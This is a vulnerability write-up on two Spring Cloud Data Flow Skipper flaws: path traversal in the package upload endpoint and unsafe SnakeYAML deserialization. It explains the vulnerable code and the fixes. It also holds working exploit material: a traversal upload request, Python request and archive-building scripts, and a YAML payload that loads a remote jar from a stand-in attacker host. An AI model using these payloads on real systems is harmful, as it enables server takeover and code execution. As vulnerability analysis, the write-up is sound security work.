Detailed Analysis of Recent Spring Cloud Data Flow Vulnerabilities
Environment Setup
Any version from 2.10.0 through 2.11.2 works; 2.11.2 is used here.
Source code: https://github.com/spring-cloud/spring-cloud-dataflow/tree/v2.11.2
Docker compose files are provided under src/docker-compose, so the environment can simply be brought up with Docker.
Two vulnerabilities were disclosed recently, and both share the same entry point.
Arbitrary File Write
Vulnerability Description
https://avd.aliyun.com/detail?id=AVD-2024-22263
Affected versions: 2.10.0 - 2.11.2
Spring Cloud Data Flow (SCDF) is a microservices-based toolkit for building streaming and batch data processing pipelines on Cloud Foundry and Kubernetes. In affected versions, the Skipper Server does not properly validate the paths contained in an uploaded zip file, so an attacker with access to the Skipper Server API can use an upload request to write arbitrary files to arbitrary locations on the file system and thereby take over the server.
Vulnerability Analysis
Following the advisory published by Aliyun, we locate the code that handles zip uploads in PackageController.java:
@RequestMapping(path = "/upload", method = RequestMethod.POST)
@ResponseStatus(HttpStatus.CREATED)
public EntityModel<PackageMetadata> upload(@RequestBody UploadRequest uploadRequest) {
    return this.packageMetadataResourceAssembler.toModel(this.packageService.upload(uploadRequest));
}
Following the call leads to the upload method of packageService.
The method is fairly long. It starts with validateUploadRequest(uploadRequest), which checks whether the request is valid; let's step into it:
private void validateUploadRequest(UploadRequest uploadRequest) {
    Assert.notNull(uploadRequest.getRepoName(), "Repo name can not be null");
    Assert.notNull(uploadRequest.getName(), "Name of package can not be null");
    Assert.notNull(uploadRequest.getVersion(), "Version can not be null");
    try {
        Version.valueOf(uploadRequest.getVersion().trim());
    }
    catch (ParseException e) {
        throw new SkipperException("UploadRequest doesn't have a valid semantic version. Version = " +
                uploadRequest.getVersion().trim());
    }
    Assert.notNull(uploadRequest.getExtension(), "Extension can not be null");
    Assert.isTrue(uploadRequest.getExtension().equals("zip"), "Extension must be 'zip', not "
            + uploadRequest.getExtension());
    Assert.notNull(uploadRequest.getPackageFileAsBytes(), "Package file as bytes must not be null");
    Assert.isTrue(uploadRequest.getPackageFileAsBytes().length != 0, "Package file as bytes must not be empty");
    PackageMetadata existingPackageMetadata = this.packageMetadataRepository.findByRepositoryNameAndNameAndVersion(
            uploadRequest.getRepoName().trim(), uploadRequest.getName().trim(), uploadRequest.getVersion().trim());
    if (existingPackageMetadata != null) {
        throw new SkipperException(String.format("Failed to upload the package. " + "" +
                "Package [%s:%s] in Repository [%s] already exists.",
                uploadRequest.getName(), uploadRequest.getVersion(), uploadRequest.getRepoName().trim()));
    }
}
First, every required field is checked for null, and the version must parse as a valid semantic version.
The extension, i.e. the file name suffix, must be exactly "zip".
The file content is read through getPackageFileAsBytes and, as the surrounding error messages show, must be supplied as a non-empty byte array. Finally, the (repoName, name, version) combination must not already exist in the repository.
Back in the upload method, we reach Repository localRepositoryToUpload = getRepositoryToUpload(uploadRequest.getRepoName());
Stepping into that method:
private Repository getRepositoryToUpload(String repoName) {
    Repository localRepositoryToUpload = this.repositoryRepository.findByName(repoName);
    if (localRepositoryToUpload == null) {
        throw new SkipperException("Could not find local repository to upload to named " + repoName);
    }
    if (!localRepositoryToUpload.isLocal()) {
        throw new SkipperException("Repository to upload to is not a local database hosted repository.");
    }
    return localRepositoryToUpload;
}
localRepositoryToUpload must be non-null; it is looked up from repositoryRepository by name.
Debugging shows there is only a single repository, named "local", so for no exception to be thrown our repoName simply has to be "local".
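Putting these checks together, a minimal request body that passes both validateUploadRequest and getRepositoryToUpload looks roughly like this (a sketch; repoName is fixed to the only local repository, while name, version and the zip bytes are attacker-controlled):

# Python sketch of a minimal UploadRequest body (field values are illustrative)
upload_request = {
    "repoName": "local",                    # must match the single built-in local repository
    "name": "lll",                          # package name, later concatenated into file paths
    "version": "1.1.1",                     # must be a valid semantic version
    "extension": "zip",                     # must be exactly "zip"
    "packageFileAsBytes": [80, 75, 3, 4],   # raw zip bytes as a list of integers (truncated here)
}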
Back in upload, the key part is:
Path packageFile = Paths
        .get(packageDir.getPath() + File.separator + uploadRequest.getName() + "-"
                + uploadRequest.getVersion() + "." + uploadRequest.getExtension());
Assert.isTrue(packageDir.exists(), "Package directory doesn't exist.");
Files.write(packageFile, uploadRequest.getPackageFileAsBytes());
Our bytes are written to packageFile and then unpacked into packageDir:
ZipUtil.unpack(packageFile.toFile(), packageDir);
packageDir is built without filtering directory traversal sequences such as ../:
File packageDir = new File(packageDirPath + File.separator + uploadRequest.getName());
So we can have the archive extracted into an arbitrary directory, and from there getting a shell is trivial.
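A quick local illustration of what the unsanitized name does to the path (the packageDirPath value below is hypothetical, not taken from the server):

import os

# Hypothetical server-side package directory
package_dir_path = "/opt/skipper/packages/upload-1234"

# Attacker-controlled name containing traversal sequences
name = "../../lll"

package_dir = package_dir_path + os.sep + name
print(os.path.normpath(package_dir))
# -> /opt/skipper/lll : ZipUtil.unpack extracts the archive outside the intended directory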
Vulnerability Reproduction
First we need to craft a zip file. To merely prove the vulnerability the content does not matter; showing that it gets extracted into an arbitrary directory is enough.
Create a file, compress it into a zip archive, and then use the following script to turn the archive into a list of byte values:
def zip_to_byte_list(zip_file_path):
    # Read the zip archive and return its raw bytes as a list of integers
    with open(zip_file_path, 'rb') as file:
        zip_data = file.read()
    return [byte for byte in zip_data]

zip_file_path = '1.zip'
zip_byte_list = zip_to_byte_list(zip_file_path)
print(zip_byte_list)
The resulting byte list looks like this:
[80, 75, 3, 4, 20, 0, 0, 0, 0, 0, 195, 113, 185, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 49, 46, 116, 120, 116, 80, 75, 1, 2, 20, 0, 20, 0, 0, 0, 0, 0, 195, 113, 185, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 36, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 49, 46, 116, 120, 116, 10, 0, 32, 0, 0, 0, 0, 0, 1, 0, 24, 0, 0, 165, 60, 191, 106, 174, 218, 1, 5, 122, 215, 243, 33, 175, 218, 1, 5, 122, 215, 243, 33, 175, 218, 1, 80, 75, 5, 6, 0, 0, 0, 0, 1, 0, 1, 0, 87, 0, 0, 0, 35, 0, 0, 0, 0, 0]
Then send the request, using the name field to perform the directory traversal:
{"repoName":"local","name":"../../lll","version":"1.1.1","extension":"zip","packageFileAsBytes":[80, 75, 3, 4, 20, 0, 0, 0, 0, 0, 195, 113, 185, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 49, 46, 116, 120, 116, 80, 75, 1, 2, 20, 0, 20, 0, 0, 0, 0, 0, 195, 113, 185, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 36, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 49, 46, 116, 120, 116, 10, 0, 32, 0, 0, 0, 0, 0, 1, 0, 24, 0, 0, 165, 60, 191, 106, 174, 218, 1, 5, 122, 215, 243, 33, 175, 218, 1, 5, 122, 215, 243, 33, 175, 218, 1, 80, 75, 5, 6, 0, 0, 0, 0, 1, 0, 1, 0, 87, 0, 0, 0, 35, 0, 0, 0, 0, 0]}
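A minimal sketch of sending this request with Python's requests library (the target URL is an assumption for a local setup; the Skipper server listens on port 7577 by default):

import requests

url = "http://127.0.0.1:7577/api/package/upload"   # hypothetical target

body = {
    "repoName": "local",
    "name": "../../lll",                  # directory traversal via the package name
    "version": "1.1.1",
    "extension": "zip",
    "packageFileAsBytes": zip_byte_list,  # list produced by zip_to_byte_list('1.zip') above
}

resp = requests.post(url, json=body)
print(resp.status_code, resp.text)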
Finally, go into the lll directory and check whether 1.txt is there.
Vulnerability Fix
In the patched version the path is normalized before being used.
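The general mitigation pattern looks like the sketch below (Python, for illustration only; this is not the project's actual Java patch): canonicalize the final path and reject it if it no longer lives under the intended package directory.

import os

def safe_join(base_dir, user_supplied_name):
    # Canonicalize the combined path and make sure it is still inside base_dir
    candidate = os.path.realpath(os.path.join(base_dir, user_supplied_name))
    base = os.path.realpath(base_dir)
    if not candidate.startswith(base + os.sep):
        raise ValueError("path escapes the package directory")
    return candidate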
YAML Deserialization
The root cause is essentially the same as CVE-2024-22263: the damage comes from the same upload endpoint, only the sink is different.
Vulnerability Description
Reference: https://avd.aliyun.com/detail?id=AVD-2024-37084
Spring Cloud Data Flow (SCDF) is a microservices-based toolkit for building streaming and batch data processing pipelines on Cloud Foundry and Kubernetes. In affected versions, the Skipper server does not validate paths when handling file uploads, so an attacker with access to the Skipper server API can craft a request that writes a YAML file to an arbitrary location on the server. Because PackageMetadata is created by deserializing that YAML with a default Constructor, this leads to arbitrary code execution.
Vulnerability Analysis
This is a YAML deserialization vulnerability, triggered by getting a crafted YAML file deserialized.
The entry point is again the /api/package/upload endpoint, and the trigger point is the read method of DefaultPackageReader.
In upload, as long as no exception is thrown along the way, the read method gets executed.
The isTrue assertion checks whether unzippedPath exists; this path comes from
String unzippedPath = packageDir.getAbsolutePath() + File.separator + uploadRequest.getName()
        + "-" + uploadRequest.getVersion();
If the name we supply is lll, the concatenated path ends in lll-1.1.1, whereas after extraction we only have the lll directory itself. The workaround is simple: make the archive's top-level folder be named lll-1.1.1 (see the sketch below).
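A quick sketch of building such an archive with Python's zipfile module, so that packageDir/lll-1.1.1 exists after ZipUtil.unpack (lll and 1.1.1 are the example name and version used above; the content of package.yml is discussed below):

import zipfile

# package.yml holds the YAML payload (see the analysis of loadPackageMetadata below)
with open("package.yml", "r") as f:
    payload = f.read()

# The single top-level folder must be "<name>-<version>" so that
# unzippedPath (= packageDir/<name>-<version>) exists after unpacking
with zipfile.ZipFile("package.zip", "w") as zf:
    zf.writestr("lll-1.1.1/package.yml", payload)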
Now for the key part: step into the read method.
The argument passed in is unpackagedFile, i.e. the directory holding the unpacked files.
The main vulnerable spot is here:
it checks whether the name of each unpacked file equals package.yaml or package.yml,
and if so calls loadPackageMetadata to load it:
private PackageMetadata loadPackageMetadata(File file) {
    // The Representer will not try to set the value in the YAML on the
    // Java object if it isn't present on the object
    DumperOptions options = new DumperOptions();
    Representer representer = new Representer(options);
    representer.getPropertyUtils().setSkipMissingProperties(true);
    LoaderOptions loaderOptions = new LoaderOptions();
    Yaml yaml = new Yaml(new Constructor(PackageMetadata.class, loaderOptions), representer);
    String fileContents = null;
    try {
        fileContents = FileUtils.readFileToString(file);
    }
    catch (IOException e) {
        throw new SkipperException("Error reading yaml file", e);
    }
    PackageMetadata pkgMetadata = (PackageMetadata) yaml.load(fileContents);
    return pkgMetadata;
}
As we can see, the file contents are read and passed straight to yaml.load for deserialization. Because a plain SnakeYAML Constructor (not SafeConstructor) is used, explicit global tags in the YAML can instantiate arbitrary classes.
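For the contents of package.yml, the commonly cited payload is the same gadget class as CVE-2022-1471: a ScriptEngineManager built over a remote URLClassLoader, which loads and instantiates a malicious ScriptEngineFactory from an attacker-controlled jar. A sketch that writes such a file (the URL is a placeholder for a server you control):

# Writes a package.yml abusing SnakeYAML's support for explicit global tags.
# http://attacker.example/yaml-payload.jar is a placeholder; the jar must expose a
# javax.script.ScriptEngineFactory service whose constructor runs the attacker's code.
payload = ('!!javax.script.ScriptEngineManager '
           '[!!java.net.URLClassLoader [[!!java.net.URL '
           '["http://attacker.example/yaml-payload.jar"]]]]\n')

with open("package.yml", "w") as f:
    f.write(payload)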
Vulnerability Fix
The patched code uses a constructor that extends SnakeYAML's SafeConstructor; SafeConstructor only builds standard YAML types, which blocks this kind of arbitrary class instantiation.